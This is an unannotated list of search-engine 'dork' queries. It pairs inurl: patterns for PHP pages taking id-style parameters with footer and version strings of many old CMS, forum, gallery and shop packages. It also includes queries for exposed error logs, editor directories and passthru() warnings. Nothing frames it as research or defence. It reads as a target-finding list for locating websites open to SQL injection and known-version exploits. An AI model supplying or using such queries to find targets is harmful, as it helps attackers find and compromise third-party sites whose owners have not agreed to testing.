inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
" ""Jax Calendar v1.34 by Jack (tR), http://www.jtr.de/scripting/php"""
" ""Powered By Azadi Network"" "
""" ActiveKB v1.5 Copyright ©"""
""" Powered by JTL-Shop 2"" "
""" Powered by Pie Cart Pro """
""" Powered by Xpoze """
""" created by creato.biz """
"""& Spider Friendly by Crack"""
"""© This site is NITROpowered!"""
"""© by CyberTeddy"""
"""/index.php?id=cmp-noticias"""
"""/nuke/htmltonuke.php"" - ""htmltonuke.php"""
"""/nuke/iframe.php"""
"""/subcat.php?cate_id="""
"""100% | 50% | 25%"" ""Back to gallery"" inurl:""show.php?imageid="""
"""1999-2004 FuseTalk Inc"" -site:fusetalk.com"
"""2003 DUware All Rights Reserved"""
"""2004-2005 ReloadCMS Team."""
"""2005 http://www.frank-karau.de"" | ""2006 http://www.frank-karau.de"""
"""2005 SugarCRM Inc. All Rights Reserved"" ""Powered By SugarCRM"""
"""2006 by http://www.mani-stats-reader.de.vu"""
"""2007 BookmarkX script"""
"""2007 RADIOZAZA http://www.radiozaza.de? istek hatti Version 2.5"" "
"""2007 Rafal Kucharski"""
"""2009 Jorp"""
"""ATutor 1.6.4"" "
"""Absolute Poll Manager XE"""
"""AcmlmBoard v1.A2"""
"""Active Webcam Page"" inurl:8080"
"""ActualAnalyzer Lite (free) 2.78""+""Copyright © 2006 ActualScripts"" "
"""Affiliate Network Pro"""
"""All Rights Reserved. Powered by DieselScripts.com"" "
"""AlumniServer project"""
"""Aurora CMS"""
"""Barbecued by sNews"""
"""Basado en Spirate"""
"""Based on DoceboLMS 2.0"""
"""Betrieben mit Serendipity 1.0.3"""
"""BioScripts"""
"""BlackBoard 1.5.1-f | © 2003-4 by Yves Goergen"""
"""BlogMe PHP created by Gamma Scripts"""
"""BosDates Calendar System "" ""powered by BosDates v3.2 by BosDev"""
"""Browse with Interactive Map"""
"""Bu Site Ticimax E-Ticaret yazılımı ile hazırlanmıştır."""
"""By Geeklog"" ""Created this page in"" +seconds +powered "
"""By Geeklog"" ""Created this page in"" +seconds +powered inurl:public_html "
"""CMS Webmanager-pro"""
"""CNStats 2.9"""
"""CaLogic Calendars V1.2.2"""
"""Calendar programming by AppIdeas.com"" filetype:php"
"""ClanSys v.1.1"""
"""Cms.tut.su, 2009 g."""
"""Content managed by the Etomite Content Management System"""
"""Copyright © 2000 Phorum Development Team"""
"""Copyright © 2004-2006 by Simple PHP Guestbook"" "
"""Copyright 2000 - 2005 Miro International Pty Ltd. All rights reserved"" ""Mambo is Free Software released"""
"""Copyright 2004 easy-content forums"""
"""Copyright 2004 © Digital Scribe v.1.4"""
"""Copyright 2005 Affiliate Directory"""
"""Copyright 2008 ImenAfzar ver :2.0.0.0"""
"""Copyright @2007 Iatek LLC"""
"""Copyright Devellion Limited 2005. All rights reserved."""
"""Copyright Interactivefx.ie"" "
"""Copyright KerviNet"""
"""Copyright MaxiSepet ©"" "
"""Copyright © 2002 Agustin Dondo Scripts"""
"""Copyright-2008@zeejobsite.com"""
"""Copyrights © 2005 Belgische Federale Overheidsdiensten"""
"""CosmoShop by Zaunz Publishing"" inurl:""cgi-bin/cosmoshop/lshop.cgi"" -johnny.ihackstuff.com -V8.10.106 -V8.10.100 -V.8.10.85 -V8.10.108 -V8.11*"
"""Create your own free webring and bring traffic to your website. Join now, it's free!"""
"""Created by weenCompany"" "
"""Creative Guestbook"""
"""Cyphor (Release:"" -www.cynox.ch"
"""CzarNews v1.12 "" | ""CzarNews v1.13"" | ""CzarNews v1.14 """
"""DeeEmm CMS"""
"""Desenvolvido por WeBProdZ"""
"""Desenvolvido por: Fio Mental"""
"""Designed & Developed by N.E.T E-Commerce Group. All Rights Reserved."""
"""Designed & Developed by Zeeways.com"""
"""Designed & Developed by net-finity"""
"""Designed and Developed by Debliteck Ltd"" "
"""Designed and powered by AWS Sports"""
"""Designed by Spaceacre"" "
"""Devana is an open source project !"""
"""Developed by Bispage.com"" "
"""Developed by Infoware Solutions"""
"""Developed by Quate.net."""
"""Developed by rbk"""
"""Diseño Web Hernest Consulting S.L."" "
"""Driven by DokuWiki"""
"""Easy-Clanpage v2.2"""
"""Emanuele Guadagnoli"" ""CcMail"""
"""Emefa Guestbook V 3.0"""
"""Enter ip"" inurl:""php-ping.php"""
"""Everyone should be on TV! Now you can upload 2 TV"""
"""Eyeland Studio Inc. All Rights Reserved."" "
"""Eyeland Studio Inc. All Rights Reserved."" inurl:game.php "
"""FC Bigfeet"" -inurl:mail"
"""Factux le facturier libre V 1.1.5"" "
"""FlatNuke"" ""Valid HTML 4.01!"" ""Valid CSS!"" ""Get RSS 2.0 Feed"" ""Get RSS "
"""FlatNuke"" ""Valid HTML 4.01!"" ""Valid CSS!"" ""Get RSS 2.0 Feed"" ""Get RSS"
"""Forum Active Bulletin Board version 1.1 béta 2"""
"""FrontAccounting"""
"""Galerie 3.2 © 2004 by progressive"""
"""Gallery powered by fMoblog"""
"""Généré par KDPics v1.18"" "
"""Help * Contact * Imprint * Sitemap"" | ""powered by papoo"" | ""powered by cms papoo"""
"""Help desk software by United Web Coders rev. 3.0.640"" "
"""IceWarp Web Mail 5.3.0"" ""Powered by IceWarp"""
"""Ideal BB Version: 0.1"" -idealbb.com"
"""Instant Free File Uploader"" "
"""Internet Photoshow - Slideshow"""
"""Jevonweb Guestbook"""
"""Jinzora Media Jukebox"""
"""Ladder Scripts by http://www.mygamingladder.com"""
"""Ladder Scripts by"""
"""Liberum Help Desk, Copyright © 2001 Doug Luxem"""
"""Liberum Help Desk, Copyright © 2001 Doug Luxem. Please view the license"
"""LinPHA Version 1.3.x"" or ""The LinPHA developers"" "
"""Maintained with Subscribe Me 2.044.09p""+""Professional"" inurl:""s.pl"""
"""MangoBery 1.0 Alpha"""
"""Marketplace Version 1.1.1"""
"""Members Statistics"" +""Total Members"" +""Guests Online"""
"""MidiCart PHP Database Management"""
"""Mimicboard2 086""+""2000 Nobutaka Makino""+""password""+""message"" inurl:page=1"
"""MobPartner Counter"" ""upload files"" "
"""Multi-Page Comment System"""
"""MunzurSoft Wep Portal W3"""
"""My Photo v1.46.4 © Big Resources"""
"""News Managed by Ditto News"""
"""News generated by Utopia News Pro"" | ""Powered By: Utopia News Pro"""
"""Obtenez votre forum Aztek"" -site:forum-aztek.com"
"""Online Store - Powered by ProductCart"""
"""PHP BP Team"" "
"""PHP Easy Downloader"""
"""PHP Gallery © 2010 PHP Weby hostgator coupon"" "
"""PHP Gallery © 2010 PHP Weby hostgator coupon"""
"""PHP Link Portal v1.95.1 © Big Resources, Inc."""
"""PHP Project Management 0.8.10"""
"""PHP WEBQUEST VERSION "" or inurl:""/phpwebquest/"" "
"""PHPAuction GPL Enhanced V2.51 by AuctionCode.com"" "
"""PHPGlossar Version 0.8"""
"""PHPNews Version 0.93"""
"""PHPWebAdmin for hMailServer"" intitle:PHPWebAdmin -site:hmailserver.com"
"""PKs Movie Database"""
"""POWERED BY ALITALK"""
"""POWERED BY LOG1 CMS"""
"""POWERED BY PHPNUKE.IR"""
"""POWERED BY ZIPBOX MEDIA"" inurl:""album.php"""
"""POWERED BY: WEBINSPIRE"""
"""Page created in"" ""seconds by glFusion"" +RSS"
"""ParsBlogger ? 2006. All rights reserved"""
"""Personal .NET Portal"""
"""PhpCollab . Log In"" | ""NetOffice . Log In"" | (intitle:""index.of."" intitle:phpcollab|netoffice inurl:phpcollab|netoffice -gentoo)"
"""PhpLinkExchange v1.02"" "
"""Power by Blakord Portal"""
"""Power by:RichStrong CMS"""
"""PowerMovieList 0.14 Beta Copyright"""
"""Powerd by http://www.e-webtech.com"" "
"""Powerd by http://www.e-webtech.com"""
"""Powered *: newtelligence"" (""dasBlog 1.6""| ""dasBlog 1.5""| ""dasBlog 1.4""|""dasBlog 1.3"")"
"""Powered By 0DayDB v2.3"""
"""Powered By 4smart"" "
"""Powered By 4smart"""
"""Powered By : Yamamah Version 1.00"" "
"""Powered By AV Arcade"""
"""Powered By Aardvark Topsites PHP 4.2.2"""
"""Powered By AlstraSoft AskMe Pro"""
"""Powered By Aqua Cms"""
"""Powered By Basic CMS SweetRice"""
"""Powered By CMS-BRD"""
"""Powered By CrownWeb.net!"" inurl:""page.cfm"""
"""Powered By Dejcom Market CMS"""
"""Powered By Dew-NewPHPLinks v.2.1b"""
"""Powered By DynamicPAD"""
"""Powered By EgyPlus"""
"""Powered By Gravity Board X v2.0 BETA"""
"""Powered By HASHE"""
"""Powered By IP.Board 3.0.0 Beta 5"""
"""Powered By OpenCart"""
"""Powered By PageAdmin CMS Free Version"""
"""Powered By Pligg"" + ""Legal: License and Source"""
"""Powered By ScozNews"""
"""Powered By Steamcast ""0.9.75 beta"
"""Powered By The Black Lily 2007"""
"""Powered By W3infotech"""
"""Powered By Webcards"""
"""Powered By X7 Chat"""
"""Powered By Zoopeer"""
"""Powered By diskos"""
"""Powered By phpBB Garage 1.2.0"""
"""Powered By phpCOIN 1.2.2"""
"""Powered By phpCOIN v1.2.1"" / ""mod.php?mod=faq"" "
"""Powered By: lucidCMS 1.0.11"""
"""Powered by YDC"""
"""Powered by MetInfo 2.0"""
"""Powered by MetInfo 3.0"""
"""Powered by vlBook 1.21"""
"""Powered by http://www.aspportal.net"""
"""Powered by 68kb"" "
"""Powered by : elkagroup.com"" "
"""Powered by A-CART"""
"""Powered by AJ-Fork v.167"""
"""Powered by AMCMS3"""
"""Powered by Absolute File Send"""
"""Powered by Absolute Podcast"""
"""Powered by Active PHP Bookmarks v1.3"" inurl:.view_group.php?id= "
"""Powered by Ajax Portal 3.0"""
"""Powered by AlstraSoft SendIt Pro"""
"""Powered by Atomic Photo Album"" inurl:""photo.php?apa_album_ID="""
"""Powered by AzDg"" (2.1.3 | 2.1.2 | 2.1.1)"
"""Powered by BIGACE 2.4"""
"""Powered by BIGACE 2.5"""
"""Powered by BLOG:CMS""|""Powered by blogcms.com""|""2003-2004, Radek Hulán"""
"""Powered by Battle Blog"""
"""Powered by BosClassifieds Classified Ads System"""
"""Powered by Burning Board Lite 1.0.2 * 2001-2004"""
"""Powered by Burning Board Lite 1.0.2"" or ""Powered by Burning Board 2.3.6"""
"""Powered by Burning Board"" -exploit -johnny"
"""Powered by CCLeague Pro"""
"""Powered by CMS.GE"""
"""Powered by CMScout ©2005 CMScout Group"""
"""Powered by CMSimple"""
"""Powered by ClanAdmin Tools v1.4.2"""
"""Powered by ClanTiger"" "
"""Powered by ClanTiger"""
"""Powered by Claroline"" -demo"
"""Powered by Clicknet CMS"""
"""Powered by Clipshare"""
"""Powered by Comdev News Publisher"""
"""Powered by ComicShout"""
"""Powered by CommonSense CMS"" "
"""Powered by Content Injector v1.52"""
"""Powered by Content Injector v1.53"""
"""Powered by Coppermine Photo Gallery"" ( ""v1.2.2 b"" | ""v1.2.1"" | ""v1.2"" | ""v1.1"" | ""v1.0"")"
"""Powered by Coppermine Photo Gallery"""
"""Powered by CubeCart 3.0.4"" "
"""Powered by CubeCart"""
"""Powered by CuteNews"""
"""Powered by DCP-Portal v5.5"""
"""Powered by DMXReady Site Chassis Manager"" -site:dmxready.com"
"""Powered by DVHome.cn"""
"""Powered by DWdirectory"""
"""Powered by DZcms"""
"""Powered by Dayfox Designs"""
"""Powered by DesClub.com - phpLinkat"""
"""Powered by DigitalHive"""
"""Powered by Download 3000"""
"""Powered by Drake CMS"" inurl:index.php?option=guestbook"
"""Powered by Drumbeat"" inurl:index02.php "
"""Powered by ECShop v2.5.0"""
"""Powered by EPay Enterprise"" inurl:""shop.htm?cid="" | nurl:""shop.php?cid="""
"""Powered by EZCMS"""
"""Powered by Elgg, the leading open source social networking platform"""
"""Powered by Espinas IT"" "
"""Powered by ExBB """
"""Powered by F3Site"""
"""Powered by FUDForum 2.6"" -site:fudforum.org -johnny.ihackstuff"
"""Powered by FUDForum 2.7"" -site:fudforum.org -johnny.ihackstuff"
"""Powered by FUDforum"""
"""Powered by Fantastic News v2.1.2"" or ""Powered by Fantastic News v2.1.3"""
"""Powered by FlashGameScript"""
"""Powered by ForumApp"""
"""Powered by FreeWebshop"""
"""Powered by FreeWebshop.org 2.2.1"""
"""Powered by FubarForum v1.5"""
"""Powered by FubarForum v1.6"""
"""Powered by GGCMS"""
"""Powered by GTChat 0.95""+""User Login""+""Remember my login information"""
"""Powered by Gallery v1.4.4"""
"""Powered by GameSiteScript"""
"""Powered by GeN4"""
"""Powered by GetMyOwnArcade"""
"""Powered by Glossword 1.8.11"" OR ""Powered by Glossword 1.8.6"""
"""Powered by Gravy Media"""
"""Powered by Grayscale Blog"""
"""Powered by How2asp"""
"""Powered by IMGallery"""
"""Powered by INVOhost"""
"""Powered by IceWarp Software"" inurl:mail"
"""Powered by Ikonboard 3.1.1"""
"""Powered by Invision Power Board(U) v1.3 Final"""
"""Powered by KaiBB 1.0.1"""
"""Powered by Knowledge Base"""
"""Powered by LDU"""
"""Powered by Leap"""
"""Powered by LifeType"" ""RSS 0.90"" ""RSS 1.0"" ""RSS 2.0"" ""Valid XHTML 1.0 Strict and CSS"""
"""Powered by LightBlog"" - Powered by LightBlog"
"""Powered by LightNEasy"""
"""Powered by Locazolist Copyright © 2006"""
"""Powered by LoudBlog"""
"""Powered by Loudblog"""
"""Powered by MD-Pro"" | ""made with MD-Pro"""
"""Powered by MDForum"""
"""Powered by Maian Recipe v1.0"""
"""Powered by Md-Pro"""
"""Powered by Megabook *"" inurl:guestbook.cgi"
"""Powered by MercuryBoard [v1"""
"""Powered by MercuryBoard"""
"""Powered by Minerva"""
"""Powered by MobPartner"" inurl:""chat.php"""
"""Powered by My Blog"" intext:""FuzzyMonkey.org"""
"""Powered by My PHP Indexer 1.0"""
"""Powered by MySpace Content Zone"""
"""Powered by NovaBoard v1.0.0"""
"""Powered by NovaBoard v1.1.2"""
"""Powered by Nukedit"""
"""Powered by OnePound"""
"""Powered by Online Grades"""
"""Powered by Orca Interactive Forum Script"""
"""Powered by Ovidentia"""
"""Powered by PG Online Training Solution - learning management system"""
"""Powered by PG Real Estate Solution - real estate web site design"""
"""Powered by PG Roomate Finder Solution - roommate estate web site design"""
"""Powered by PHP Advanced Transfer Manager v1.30"""
"""Powered by PHP Director 0.2"""
"""Powered by PHP Director"""
"""Powered by PHP Live! v3.3"""
"""Powered by PHP Photo Album"""
"""Powered by PHP Shop from DeltaScripts"""
"""Powered by PHP iCalendar"""
"""Powered by PHP-Fusion v6.00.110"" | ""Powered by PHP-Fusion v6.00.2.."" | ""Powered by PHP-Fusion v6.00.3.."" -v6.00.400 -johnny.ihackstuff"
"""Powered by PHP-Update"" -site:www.php-update.co.uk"
"""Powered by PHPBasket"""
"""Powered by PHPizabi v0.848b C1 HFP1"""
"""Powered by PMOS Help Desk"""
"""Powered by PWP Version 1-5-1"" AND inurl:""/wiki/run.php"""
"""Powered by ParsBlogger"""
"""Powered by Philboard"" inurl:""philboard_forum.asp"""
"""Powered by Populum"" "
"""Powered by PowerPortal v1.3"""
"""Powered by ProjectCMS"""
"""Powered by PsNews"" "
"""Powered by PunBB"""
"""Powered by Quick.Cart"""
"""Powered by Quick.Cms"""
"""Powered by RGameScript"""
"""Powered by RW::Download v2.0.3 lite"""
"""Powered by Real Estate Portal"""
"""Powered by RealAdmin and Red Cow Technologies, Inc."" "
"""Powered by Reciprocal Links Manager"""
"""Powered by RedCat"" inurl:index.php?contentId= "
"""Powered by Rock Band CMS 0.10"" "
"""Powered by SLAED CMS"""
"""Powered by SMF"""
"""Powered by SOFTMAN"""
"""Powered by SOOP Portal Raven 1.0b"""
"""Powered by SazCart"""
"""Powered by Scallywag"" "
"""Powered by Scratcher"" "
"""Powered by Scripteen Free Image Hosting Script V 2.3"""
"""Powered by Scripteen Free Image Hosting Script V1.2"""
"""Powered by Seditio"""
"""Powered by Shadowed Portal"""
"""Powered by Shop-Script FREE"""
"""Powered by Shout!"""
"""Powered by Simple PHP Text newsletter"""
"""Powered by Simplog"""
"""Powered by SiteEngine"""
"""Powered by SiteX 0.7 Beta"" "
"""Powered by Smoothflash"""
"""Powered by SocketMail Lite version 2.2.8. Copyright © 2002-2006"""
"""Powered by SoftbizScripts"" ""ALL JOBS"""
"""Powered by SoftbizScripts"" ""OUR SPONSORS"""
"""Powered by SoftbizScripts"" inurl:""searchresult.php?sbcat_id="""
"""Powered by SoftbizScripts"" inurl:store_info.php"
"""Powered by TS Special Edition"" "
"""Powered by TinyPHPForum v3.61"""
"""Powered by UCStats version 1.1"" "
"""Powered by UNAK-CMS"""
"""Powered by UNO.com.my"""
"""Powered by UPB"" (b 1.0)|(1.0 final)|(Public Beta 1.0b)"
"""Powered by UPB"""
"""Powered by VS PANEL 7.5.5"""
"""Powered by VS PANEL"""
"""Powered by Vsns Lemon"" intitle:""Vsns Lemon"""
"""Powered by WSN Guest"" "
"""Powered by WebStudio eCatalogue"""
"""Powered by WebStudio eHotel"""
"""Powered by WebText"""
"""Powered by Woltlab Burning Board"" -""2.3.3"" -""v2.3.3"" -""v2.3.2"" -""2.3.2"""
"""Powered by WordPress"" -html filetype:php -demo -wordpress.org -bugtraq"
"""Powered by WowBB"" -site:wowbb.com"
"""Powered by XHP CMS"" -ihackstuff -exploit -xhp.targetit.ro"
"""Powered by XMB"""
"""Powered by XOOPS 2.2.3 Final"""
"""Powered by Xaraya"" ""Copyright 2005"""
"""Powered by Xplode CMS"""
"""Powered by YaPig V0.92b"""
"""Powered by YourTube v1.0"""
"""Powered by ZeeMatri"""
"""Powered by Zomplog"""
"""Powered by Zorum 3.5"""
"""Powered by [ iSupport 1.8 ]"""
"""Powered by and copyright class-1"" 0.24.4"
"""Powered by autolinks pro 2.1"" inurl:register.php"
"""Powered by bSpeak 1.10"""
"""Powered by beamospetition 1.0.12"""
"""Powered by bp blog 6.0"""
"""Powered by cifshanghai.com"" "
"""Powered by cityadmin and Red Cow Technologies, Inc."""
"""Powered by cpCommerce"""
"""Powered by eXV2 Vers"""
"""Powered by ezContents Version 1.4.5"""
"""Powered by i-pos Storefront"""
"""Powered by iNetScripts"" "
"""Powered by iScripts SocialWare"""
"""Powered by ispCP Omega"" "
"""Powered by jSite 1.0 OE"""
"""Powered by mlffat"""
"""Powered by mnoGoSearch - free web search engine software"""
"""Powered by mojoPortal"" "
"""Powered by myBusinessAdmin and Red Cow Technologies, Inc."""
"""Powered by myUPB"" "
"""Powered by nzFotolog v0.4.1 © 2005-2006 Ricardo Amaral"" "
"""Powered by ocPortal"" -demo -ocportal.com"
"""Powered by osCMax v2.0"" , ""Copyright @"" ""RahnemaCo.com"" "
"""Powered by photokorn"""
"""Powered by phpCC Beta 4.2"""
"""Powered by phpMySport"""
"""Powered by sNews "" inurl:index.php?id= "
"""Powered by sNews"" "
"""Powered by samart-cms"""
"""Powered by sendcard - an advanced PHP e-card program"" -site:sendcard.org"
"""Powered by sendcard - an advanced PHP e-card program"""
"""Powered by visinia"""
"""Powered by web directory script"""
"""Powered by webSPELL"""
"""Powered by words tag script"""
"""Powered by wpQuiz"" inurl:index.php "
"""Powered by wpQuiz"""
"""Powered by xchangeboard"""
"""Powered by xeCMS"""
"""Powered by yacs"""
"""Powered by yappa-ng 2.3.1"" AND ""Powered by yappa-ng 2.3.1"""
"""Powered by yappa-ng"""
"""Powered by: Arab Portal v2"""
"""Powered by: Censura"""
"""Powered by: Elite Gaming Ladders v3.2"""
"""Powered by: IRIran.net"""
"""Powered by: Land Down Under 800"" | ""Powered by: Land Down Under 801"" - http://www.neocrome.net"
"""Powered by: MFH v1"""
"""Powered by: MyPHP Forum"""
"""Powered by: PHP Link Directory"""
"""Powered by: PhotoPost PHP 4.6"" or ""Powered by: PhotoPost PHP 4.5"""
"""Powered by: PhotoPost PHP 4.6.5"" "
"""Powered by: PostGuestbook 0.6.1"""
"""Powered by: PreProjects"""
"""Powered by: Southburn"""
"""Powered by: Yes Solutions"" "
"""Powered by: eSmile"""
"""Powered by: vBulletin * 3.0.1"" inurl:newreply.php"
"""Powie's PSCRIPT MatchMaker 4.05"""
"""REALTOR 747 - Version 4.11"""
"""RS MAXSOFT"""
"""Review Script"" ""Phil Taylor"""
"""Runcms Copyright"" ""2002 - 2007"" +""page created"""
"""S-CMS by matteoiamma"""
"""SOOP Portal 2.0"""
"""SQuery 4.5"" |""SQuery 4.0"" |""SQuery 3.9"" | inurl:""modules.php?name=SQuery"""
"""Scientific Image DataBase"""
"""Script réalisé par BinGo PHP"""
"""Search Adult Directory:"""
"""Search Affiliate Programs:"""
"""Search Projects"" intitle:""The ultimate project website"""
"""Search | Invite | Mail | Blog | Forum"""
"""Send amazing greetings to your friends and relative!"" "
"""Send amazing greetings to your friends and relative!"""
"""ShopMaker v1.0"""
"""Signkorn Guestbook 1.3"""
"""SimpleBlog 2.3 by 8pixel.net"""
"""Sinapis by scripter.ch"""
"""Site designed and built Powered by GlobalWebTek."""
"""Site designed and built by Powder Blue."" inurl:index.php?id_page="
"""Site designed and built by ProWeb Associates."""
"""Site powered By Limbo CMS"""
"""Site powered by GuppY"" | ""Site créé avec GuppY"" +inurl:lng="
"""Site powered by GuppY"""
"""Site produced by GeneralProducts.co.uk"""
"""Sitedesign by: Dieleman http://www.dieleman.nl - Copyright © 2010"" "
"""Siteman Version 1.1.9"""
"""SmodBIP"" & ""Aktualno.ci"""
"""SmodCMS"" & ""S.ownik"""
"""Software Categories"" ""Featured Resources"" ""Search"""
"""Software PBLang 4.66z"" AND ""Software PBLang 4.60"" OR ""Software PBLang"""
"""Software PBLang"" 4.65 filetype:php"
"""Splatt Forum©"""
"""SquirrelMail version 1.4.4"" inurl:src ext:php"
"""Starting bid"" ""Powered by SoftbizScripts"" "
"""TR Newsportal"" brought by TRanx."
"""TROforum 0.1"""
"""Tanyakan Pada Rumput Yang Bergoyang"" "
"""Tanyakan Pada Rumput Yang Bergoyang"""
"""Thank You for using WPCeasy"""
"""The Merchant Project"""
"""These forums are running on"" ""miniBB"""
"""This forum powered by Phorum."""
"""This is a Free & Open Source mailing list manager"""
"""This page has been automatically generated by Plesk Server Administrator"""
"""This script created by http://www.script.canavari.com"""
"""This script was created by Php-ZeroNet"" ""Script . Php-ZeroNet"""
"""This site is powered by CMS Made Simple version 1."""
"""This site is powered by CMS Made Simple version 1.2.2"""
"""This site is powered by CMS Made Simple"""
"""This site is powered by e107"""
"""This site is powered by e107""|inurl:e107_plugins|e107_handlers|e107_files"
"""This web site was made with MD-Pro"""
"""This web site was made with PostNuke"""
"""This website engine code is copyright"" ""2005 by Clever Copy"" -inurl:demo"
"""This website is powered by Mobius"""
"""This website is powered by Trio"""
"""This website powered by PHPX"" -demo"
"""This website was created with phpWebThings 1.4"""
"""This website was created with phpWebThings"""
"""TinyBB 2011 all rights reserved"""
"""Torbstoff News 4"""
"""Transloader by Somik.org"" OR ""Transloader by"" OR ""Transloder"""
"""Upload unique IP List:"" AND ""The Ultimate Fake Hit Generator - BOOST YOUR ALEXA RANK"" "
"""Uploader by CeleronDude."" "
"""Vivid Ads Shopping Cart"""
"""Web Group Communication Center beta 0.5.6"" OR ""Web Group Communication Center beta 0.5.5"""
"""Web Group Communication Center"""
"""Web Site Design by Red Cat Studios"""
"""Web site engine's code is copyright © 2001-2007 ATutor®"""
"""WebCalendar v1.0.4"""
"""Webdesign Cosmos Solutions"""
"""Website Design by Rocktime"""
"""Website Powered By Creative SplashWorks - SplashSite"" "
"""Website by Spokane Web Communications"" "
"""Website by WebSolutions.ca"""
"""Website powered by Subdreamer CMS & Sequel Theme Designed by indiqo.media"" "
"""Welcome to Exponent CMS"" | ""my new exponent site"" inurl:articlemodule "
"""Welcome to Exponent CMS"" | ""my new exponent site"""
"""Welcome to the versatileBulletinBoard"" | ""Powered by versatileBulletinBoard"""
"""X-CART. Powerful PHP shopping cart software"""
"""Yogurt build"""
"""You have not provided a survey identification num"
"""You have not provided a survey identification number"""
"""advanced_search_results.php?gender="""
"""and Powered By :Sansak"""
"""by Pivot - 1.40.5"" +'Dreadwind' -pivotlog.net"
"""by eXtreme Crew"""
"""by in-link"" or ""Powered by In-Link 2."""
"""cms SunLight 5.2"""
"""com_joom12pic"""
"""com_joomlaflashfun"""
"""com_lmo"""
"""copyright 2006 Broadband Mechanics"""
"""delete entries"" inurl:admin/delete.asp"
"""download this free gallery at matteobinda.com"""
"""driven by: ASP Message Board"""
"""eCommerce Engine © 2006 xt:Commerce Shopsoftware"" "
"""error_log"" inurl:/wp-content"
"""generated by Exhibit Engine 1.5 RC 4"""
"""hlstats.php?mode=dailyawardinfo&award="" hlstatsx "
"""inc_webblogmanager.asp"""
"""index of"" intext:fckeditor inurl:fckeditor"
"""index.php?id_menu="" CMScontrol "
"""index.php?option=com_chronoconnectivity"" / ""com_chronoconnectivity"
"""index.php?option=com_chronocontact"" / ""com_chronocontact"""
"""index.php?option=com_expose"" "
"""index.php?option=com_mdigg"""
"""index.php?option=com_news_portal"" or ""Powered by iJoomla News Portal"""
"""index.php?option=com_qcontacts"""
"""index.php?option=com_resman"""
"""index.php?option=com_rwcards"""
"""index.php?option=com_sef"" / ""com_sef"" "
"""index.php?option=com_seyret"" / ""com_seyret"""
"""index.php?sbjoke_id="""
"""index.php?section=post_upload"" "
"""intext:Warning: passthru()"" ""inurl:view=help"" "
"""inurl:/admin/"" ""ImageVue"" "
"""inurl:/site/articles.asp?idcategory="""
"""inurl:cultbooking.php"""
"""is a product of Lussumo"""
"""is proudly powered by WordPress"""
"""kims Q - Administrator Login Mode"""
"""made visual by sightFACTORY"""
"""mirco blogging"""
"""mumbo jumbo media"" + inurl:""index.php"""
"""nukeai beta3"""
"""pForum 1.29a"" OR """"Powie's PSCRIPT Forum 1.26"""
"""pForum 1.30"""
"""pages.php?page_ID="" ""K9 Kreativity"" "
"""php-addressbook"""
"""phpQuestionnaire v3"""
"""portailphp v1.3"" inurl:""index.php?affiche"" inurl:""PortailPHP"" -site:safari-msi.com"
"""powered by 4images"""
"""powered by AMCMS3"""
"""powered by Albinator"""
"""powered by AllMyGuests"""
"""powered by Blog System"" "
"""powered by Blue Dove Web Design"""
"""powered by CMS Made Simple version 1.1.2"""
"""powered by CubeCart 2.0"""
"""powered by CubeCart"" inurl:""index.php?_a="" "
"""powered by DBHcms"" "
"""powered by DreamAccount 3.1"""
"""powered by EQdkp"""
"""powered by ExtCalendar v2"""
